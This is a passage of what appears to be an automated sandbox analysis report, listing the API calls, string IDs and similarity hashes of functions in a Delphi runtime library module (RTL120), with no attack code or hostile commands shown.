                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$System@@$String$Stringx20$Sysutils@$Cat$qqrr20$From$Asg$qqrr20Comp$qqrpxbt1uiLocaleStringi$AnsiCharEnsureLen$qqrx20Str$qqrr20String$qqrr20Stringx27System@%T$us$i0$%$Char$qqrr20Clr$qqrpvCopy$qqrx20Def$qqrx20InfoInternalLen$qqrr20Length$qqrr20Length$qqrx20Long$qqrx20Move$qqrpxvpviStr$qqriix20StringbStringiiStringpbiStringriThread
                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                  • API String ID: 1621705807-1253427255
                                                                                                  • Opcode ID: 1884aa2f990ab26dba5cc17f667b94dca3a286d4ccce1ce422f9c0f14f277c91
                                                                                                  • Instruction ID: 4996f8794606f03fae622fcb1ff33eb4fce06e18e571e892f00786f695fe8f9d
                                                                                                  • Opcode Fuzzy Hash: 1884aa2f990ab26dba5cc17f667b94dca3a286d4ccce1ce422f9c0f14f277c91
                                                                                                  • Instruction Fuzzy Hash: 6A51C234A021CBCBDB10DBE8E9925EEB3A5EF91300F644363A500D7362DB74EE159791
                                                                                                  APIs
                                                                                                  • @Sysutils@FreeAndNil$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA0A
                                                                                                    • Part of subcall function 5002B124: @System@TObject@Free$qqrv.RTL120(5002EA0F,00000000,5002EB85), ref: 5002B12C
                                                                                                  • @Sysutils@TEncoding@FreeEncodings$qqrv.RTL120(00000000,5002EB85), ref: 5002EA14
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D299
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2AB
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2BD
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2CF
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2E1
                                                                                                    • Part of subcall function 5002D28C: @System@TObject@Free$qqrv.RTL120(5002EA19,00000000,5002EB85), ref: 5002D2F3
                                                                                                  • @System@RemoveModuleUnloadProc$qqrpqqrui$v.RTL120(00000000,5002EB85), ref: 5002EA1E
                                                                                                    • Part of subcall function 5000C94C: @System@@FreeMem$qqrpv.RTL120(?,?,?,?,5000C929), ref: 5000C976
                                                                                                    • Part of subcall function 5002B720: @System@@Dispose$qqrpvt1.RTL120(?,5002EA28,00000000,5002EB85), ref: 5002B73C
                                                                                                    • Part of subcall function 500274D8: InterlockedExchange.KERNEL32(500A6DBC,00000000), ref: 500274E1
                                                                                                    • Part of subcall function 500274D8: InterlockedExchange.KERNEL32(500A6DC0,00000000), ref: 500274F3
                                                                                                    • Part of subcall function 50027254: @System@TObject@Free$qqrv.RTL120(?,?,5002EA37,00000000,5002EB85), ref: 5002728E
                                                                                                    • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D0
                                                                                                    • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272D9
                                                                                                    • Part of subcall function 50027254: @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(5002EA37,00000000,5002EB85), ref: 500272E4
                                                                                                    • Part of subcall function 50027254: @System@ExceptAddr$qqrv.RTL120(5002EA37,00000000,5002EB85), ref: 500272ED
                                                                                                    • Part of subcall function 50027254: @System@ExceptObject$qqrv.RTL120(00000000,5002EA37,00000000,5002EB85), ref: 500272F3
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA46
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,5002EB85), ref: 5002EA50
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EAB5
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EACA
                                                                                                    • Part of subcall function 5000AF28: @System@@LStrClr$qqrpv.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF7A
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EADF
                                                                                                    • Part of subcall function 5000AF28: @System@@LStrArrayClr$qqrpvi.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF86
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EAF4
                                                                                                    • Part of subcall function 5000AF28: @System@@WStrClr$qqrpv.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AF97
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB09
                                                                                                    • Part of subcall function 5000AF28: @System@@WStrArrayClr$qqrpvi.RTL120(?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000AFA3
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(00000000,5002EB85), ref: 5002EB19
                                                                                                    • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                    • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(00000000,5002EB85), ref: 5002EB29
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB48
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB5D
                                                                                                  • @System@@FinalizeArray$qqrpvt1ui.RTL120(00000000,5002EB85), ref: 5002EB72
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$Array$qqrpvt1uiFinalize$Free$qqrvObject@$Free$ArrayClr$qqrpvExcept$Mem$qqrpvObject$qqrv$Clear$qqrrpvpvClr$qqrpviExchangeInterlockedSysutils@$Addr$qqrvClassClass$qqrp14Dispose$qqrpvt1Encoding@Encodings$qqrvMetaModuleNil$qqrpvObjectp17Proc$qqrpqqrui$vRemoveStringUnload
                                                                                                  • String ID: ,lP$XlP$kP
                                                                                                  • API String ID: 2770033941-639665064
                                                                                                  • Opcode ID: f23baf51e28d9a27ceff879c9aaca5bdc4a02411ffc7946e290e9f0f5d05e065
                                                                                                  • Instruction ID: 458439708314837829a00875a32db1e9822d01f5b0deb47506a78c5581f45b3e
                                                                                                  • Opcode Fuzzy Hash: f23baf51e28d9a27ceff879c9aaca5bdc4a02411ffc7946e290e9f0f5d05e065
                                                                                                  • Instruction Fuzzy Hash: 3431F0203570C147F714ABE8F82266A3221DFA1751FD08B27F1009B792CA29DD4297E2
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B29
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B38
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B3D
                                                                                                  • @Variants@VarInvalidOp$qqrv.RTL120(00000000,50030CCD,?,?,00000000,00000000), ref: 50030B47
                                                                                                  • @Sysutils@SysErrorMessage$qqrui.RTL120(?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C6F
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C8C
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030C9B
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000002,?,?,?,?,?,?,?,?,00000000,50030CCD,?,?,00000000,00000000), ref: 50030CA0
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSysutils@$Except$qqrvException@$bctr$qqrx20LoadRaiseString$qqrp20System@@Unicode$ErrorInvalidMessage$qqruiOp$qqrvRecxiStringpx14Variants@
                                                                                                  • String ID:
                                                                                                  • API String ID: 770543886-0
                                                                                                  • Opcode ID: a1282365be09462d89120203df3854cda1f43aef0eed8fd7da0b363bcbf0933f
                                                                                                  • Instruction ID: f96400911d13d964e0fb64cf20edc1743dca0574da95ff12fd542a95d4d1681a
                                                                                                  • Opcode Fuzzy Hash: a1282365be09462d89120203df3854cda1f43aef0eed8fd7da0b363bcbf0933f
                                                                                                  • Instruction Fuzzy Hash: B15183345035C9CFEF21DBE4EDA29EEB3B1AF24204F504326F90097666CB75AD059BA1
                                                                                                  APIs
                                                                                                    • Part of subcall function 50029E40: FindResourceW.KERNEL32(?,PACKAGEINFO,0000000A), ref: 50029E56
                                                                                                    • Part of subcall function 50029E40: LoadResource.KERNEL32(?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E61
                                                                                                    • Part of subcall function 50029E40: LockResource.KERNEL32(00000000,00000000,50029EA0,?,?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E81
                                                                                                    • Part of subcall function 50029E40: FreeResource.KERNEL32(00000000,50029EA7,?,?,00000000,?,PACKAGEINFO,0000000A), ref: 50029E9A
                                                                                                  • @Sysutils@GetModuleName$qqrui.RTL120(00000000,5002A3C8), ref: 5002A0CB
                                                                                                  • @Sysutils@ExtractFileName$qqrx20System@UnicodeString.RTL120(00000000,5002A3C8), ref: 5002A0D6
                                                                                                  • @Sysutils@ChangeFileExt$qqrx20System@UnicodeStringt1.RTL120(00000000,5002A3C8), ref: 5002A0E3
                                                                                                  • @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5002A3C8), ref: 5002A0F3
                                                                                                  • @System@UTF8ToString$qqrpxcxi.RTL120(00000000,00000000,5002A3C8), ref: 5002A121
                                                                                                  • @Sysutils@ChangeFileExt$qqrx20System@UnicodeStringt1.RTL120(00000000,00000000,5002A3C8), ref: 5002A131
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,5002A3C8), ref: 5002A139
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,5002A3C8), ref: 5002A13F
                                                                                                  • @Sysutils@StrLen$qqrpxc.RTL120(00000000,00000000,5002A3C8), ref: 5002A14D
                                                                                                  • @System@@New$qqripv.RTL120(00000000,5002A3C8), ref: 5002A17A
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(?,00000000,5002A3C8), ref: 5002A1B6
                                                                                                  • @Sysutils@HashName$qqrpc.RTL120 ref: 5002A1C6
                                                                                                  • @Sysutils@HashName$qqrpc.RTL120 ref: 5002A1E1
                                                                                                    • Part of subcall function 50029CF0: @System@@PCharLen$qqrpc.RTL120(?,?,00000000,?,5002A1CB), ref: 50029C6A
                                                                                                    • Part of subcall function 50029CF0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C7E
                                                                                                    • Part of subcall function 50029CF0: @System@@GetMem$qqri.RTL120(0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,5002A1CB), ref: 50029C91
                                                                                                    • Part of subcall function 50029CF0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 50029CA7
                                                                                                    • Part of subcall function 50029CF0: CharUpperBuffW.USER32(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CAE
                                                                                                    • Part of subcall function 50029CF0: @System@@FreeMem$qqrpv.RTL120(?,00000000,0000FDE9,00000000,00000000,00000000,?,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000), ref: 50029CDD
                                                                                                  • @Sysutils@StrIComp$qqrpxct1.RTL120 ref: 5002A201
                                                                                                  • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,500A7DBC,00000000), ref: 5002A27E
                                                                                                  • @System@UTF8ToString$qqrpxcxi.RTL120(00000000,00000000,500A7DBC,00000000), ref: 5002A29B
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000002,?,00000000,00000000,500A7DBC,00000000), ref: 5002A2C7
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000002,?,00000000,00000000,500A7DBC,00000000), ref: 5002A2CC
                                                                                                  • @Sysutils@StrLen$qqrpxc.RTL120 ref: 5002A37E
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5002A3CF), ref: 5002A3BA
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Sysutils@$Unicode$String$CharResource$File$AnsiByteChangeExt$qqrx20FreeFromHashLen$qqrpxcModuleMultiName$qqrpcString$qqrpxcxiStringt1System@%Wide$ArrayBuffChar$qqrx20Clr$qqrpvComp$qqrpxct1Except$qqrvException@$bctr$qqrp20ExtractFindHandleLen$qqrpcLength$qqrvLoadLockMem$qqriMem$qqrpvName$qqruiName$qqrx20New$qqripvRaiseRecpx14RecxiStr$qqrr20Str$qqrr27StringusStringx27T$us$i0$%T$us$i0$%x20Upper
                                                                                                  • String ID: .bpl$SysInit
                                                                                                  • API String ID: 832494849-1949293470
                                                                                                  • Opcode ID: 80d2e90f927725b8c34378fd1ad348739718c56a093d0ac4d107abcea30af493
                                                                                                  • Instruction ID: 837392768b698e741bc70171f0b158cd4f4db25f9bd6245715707dd2a9ab8d4f
                                                                                                  • Opcode Fuzzy Hash: 80d2e90f927725b8c34378fd1ad348739718c56a093d0ac4d107abcea30af493
                                                                                                  • Instruction Fuzzy Hash: 88D13C74E0129A9FDB10CF98D880ADEB7F5FF59304F10866AE554AB351DB30AE45CB90
                                                                                                  APIs
                                                                                                    • Part of subcall function 500246E0: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024767), ref: 50024741
                                                                                                    • Part of subcall function 500246E0: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024767), ref: 50024746
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024C6D), ref: 50024968
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024C6D), ref: 5002498C
                                                                                                  • @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50024C6D), ref: 50024997
                                                                                                  • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,50024C6D), ref: 500249B4
                                                                                                  • @Sysutils@CurrentYear$qqrv.RTL120(?,?,?,00000000,50024C6D), ref: 50024AC1
                                                                                                  • @Sysutils@CurrentYear$qqrv.RTL120(?,?,00000000,50024C6D), ref: 50024AFA
                                                                                                    • Part of subcall function 50022830: GetLocalTime.KERNEL32 ref: 50022834
                                                                                                  • @System@Pos$qqrx20System@UnicodeStringt1.RTL120(?,?,00000000,50024C6D), ref: 50024B5C
                                                                                                  • @Sysutils@TryEncodeDate$qqrusususr16System@TDateTime.RTL120(?,?,?,00000000,50024C6D), ref: 50024C3D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@Sysutils@$Ansi$CurrentFromPos$qqrx20Str$qqrr20Stringt1Stringx27System@%T$us$i0$%TimeYear$qqrv$Copy$qqrx20DateDate$qqrusususr16EncodeEnsureInternalLen$qqrx20LocalString$qqrr20StringiiTrim$qqrx20
                                                                                                  • String ID: ddd
                                                                                                  • API String ID: 267030927-4224823564
                                                                                                  • Opcode ID: 92fb4fcf5a5ca246f8cc9000afe12874db32018b39c2798d273ab4d6d16fe3e0
                                                                                                  • Instruction ID: 1069cb2eb66a71ff8ce87d181cf04f1ba4992945fcbd8b3ac5469d60a7480345
                                                                                                  • Opcode Fuzzy Hash: 92fb4fcf5a5ca246f8cc9000afe12874db32018b39c2798d273ab4d6d16fe3e0
                                                                                                  • Instruction Fuzzy Hash: 52A19034E0219A8ADB40DFE9E8506FEB7F4AF19300F50426AEC44E7251D774DE85CBA6
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001CFA9), ref: 5001CC90
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000001,?,00000400,00000000,5001CFA9), ref: 5001CCBE
                                                                                                  • WNetGetUniversalNameW.MPR(00000000,00000001,?,00000400,00000000,5001CFA9), ref: 5001CCC4
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000001,?,00000400,00000000,5001CFA9), ref: 5001CCDC
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001CFA9), ref: 5001CCFE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001CFA9), ref: 5001CD48
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001CFA9), ref: 5001CD7C
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001CFA9), ref: 5001CDA9
                                                                                                  • WNetOpenEnumW.MPR(00000001,00000001,00000000,00000000,?), ref: 5001CDCA
                                                                                                  • @System@@GetMem$qqri.RTL120(00000000,5001CF7C,?,00000000,5001CFA9), ref: 5001CDEF
                                                                                                  • WNetEnumResourceW.MPR(?,FFFFFFFF,?,?), ref: 5001CE22
                                                                                                  • @System@@ReallocMem$qqrrpvi.RTL120(?,FFFFFFFF,?,?), ref: 5001CE3F
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001CF5E,?,00000000,5001CF7C,?,00000000,5001CFA9), ref: 5001CE4C
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001CF7C,?,00000000,5001CFA9), ref: 5001CE51
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5001CECF
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?), ref: 5001CF03
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(?,?), ref: 5001CF18
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?), ref: 5001CF27
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120(?), ref: 5001CF2C
                                                                                                  • @System@@TryFinallyExit$qqrv.RTL120 ref: 5001CF31
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@Unicode$FromString$AnsiStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Exit$qqrvFinally$Char$qqrr20EnumStringpbStringx20$Asg$qqrr20Cat3$qqrr20Char$qqrx20Copy$qqrx20Mem$qqriMem$qqrrpviNameOpenReallocResourceStringiiStringt2Universal
                                                                                                  • String ID: Z
                                                                                                  • API String ID: 1098235404-1505515367
                                                                                                  • Opcode ID: ce88e6d188f896e37c4bd4105249160936e441a3b514efbdf87da04b86b1681a
                                                                                                  • Instruction ID: 71e5e890997e1f0220871d1c903543e3dfefbe9867c7c1a26dfae42662089f1d
                                                                                                  • Opcode Fuzzy Hash: ce88e6d188f896e37c4bd4105249160936e441a3b514efbdf87da04b86b1681a
                                                                                                  • Instruction Fuzzy Hash: 4BA15970A00289DBDB11DFA8DD41AEEB7F5FF09310F5042AAEA00A7251D774DE81DB95
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 5002F525
                                                                                                    • Part of subcall function 5002F4F0: GetProcAddress.KERNEL32(00000000), ref: 5002F509
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                  • Opcode ID: e06b940d9476934792f39afd65196c440aa36b4342473c26250aa0f9965bd5d2
                                                                                                  • Instruction ID: 68bf6f208d1ebe513e8a8dda1fcfe738442d494e70350c7787d103a1d8736fcd
                                                                                                  • Opcode Fuzzy Hash: e06b940d9476934792f39afd65196c440aa36b4342473c26250aa0f9965bd5d2
                                                                                                  • Instruction Fuzzy Hash: 37413B6558B6C74A23146BADF90343777D89AA4E94360833BF808CA282DFB87C408769
                                                                                                  APIs
                                                                                                    • Part of subcall function 500246E0: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024767), ref: 50024741
                                                                                                    • Part of subcall function 500246E0: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024767), ref: 50024746
                                                                                                  • @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50025040), ref: 50024D8B
                                                                                                    • Part of subcall function 5001A684: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A736), ref: 5001A6C0
                                                                                                    • Part of subcall function 5001A684: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6DF
                                                                                                    • Part of subcall function 5001A684: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6F5
                                                                                                    • Part of subcall function 5002483C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002485E
                                                                                                    • Part of subcall function 5002483C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 50024866
                                                                                                    • Part of subcall function 5002483C: @Sysutils@AnsiStrPos$qqrpbt1.RTL120(?,?,?,00000000,?,500249A4,?,00000000,50024C6D), ref: 5002486C
                                                                                                  • @Sysutils@CurrentYear$qqrv.RTL120(?,?,?,00000000,50025040), ref: 50024EAC
                                                                                                    • Part of subcall function 50022830: GetLocalTime.KERNEL32 ref: 50022834
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50025040), ref: 50024D80
                                                                                                    • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                    • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                  • @Sysutils@AnsiPos$qqrx20System@UnicodeStringt1.RTL120(00000000,50025040), ref: 50024DA5
                                                                                                  • @System@Pos$qqrx20System@UnicodeStringt1.RTL120(?,?,00000000,50025040), ref: 50024F43
                                                                                                  • @Sysutils@TryEncodeDate$qqrusususr16System@TDateTime.RTL120(?,?,?,00000000,50025040), ref: 50025010
                                                                                                    • Part of subcall function 50024778: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F4
                                                                                                    • Part of subcall function 50024778: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,5002482B), ref: 500247F9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$System@@$String$Sysutils@$Ansi$EnsureFromString$qqrr20$Char$qqrx20InternalLen$qqrx20Pos$qqrx20Str$qqrr20Stringt1Stringx27System@%T$us$i0$%Time$Asg$qqrr20CharCopy$qqrx20CurrentDateDate$qqrusususr16EncodeLen$qqrr20LocalPos$qqrpbt1StringiiStringpbiStringx20Trim$qqrx20Year$qqrv
                                                                                                  • String ID: ddd
                                                                                                  • API String ID: 1381184704-4224823564
                                                                                                  • Opcode ID: e386033784eb847864489c39f08a3879fa3b97122ed4c4e9c4fae4110e8f86f9
                                                                                                  • Instruction ID: 7e45ed9e95105cac947c5d20d2be00b22e649cf3ab46312cbd668170dbcc43f1
                                                                                                  • Opcode Fuzzy Hash: e386033784eb847864489c39f08a3879fa3b97122ed4c4e9c4fae4110e8f86f9
                                                                                                  • Instruction Fuzzy Hash: 75A1BE70A0229A8BDF40DFE5E8806FEB7F1BF19300F50426AE844E7251D7349E45CBA6
                                                                                                  APIs
                                                                                                  • @System@@InitializeRecord$qqrpvt1.RTL120 ref: 5001CA61
                                                                                                    • Part of subcall function 5000AE00: @System@@InitializeArray$qqrpvt1ui.RTL120 ref: 5000AE24
                                                                                                  • @Sysutils@ExpandFileName$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA78
                                                                                                    • Part of subcall function 5001C9D8: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000104,?), ref: 5001C9F1
                                                                                                    • Part of subcall function 5001C9D8: GetFullPathNameW.KERNEL32(00000000,00000104,?), ref: 5001C9F7
                                                                                                    • Part of subcall function 5001C9D8: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000104,?), ref: 5001CA04
                                                                                                  • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001CC45), ref: 5001CA82
                                                                                                    • Part of subcall function 5001C610: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C61E
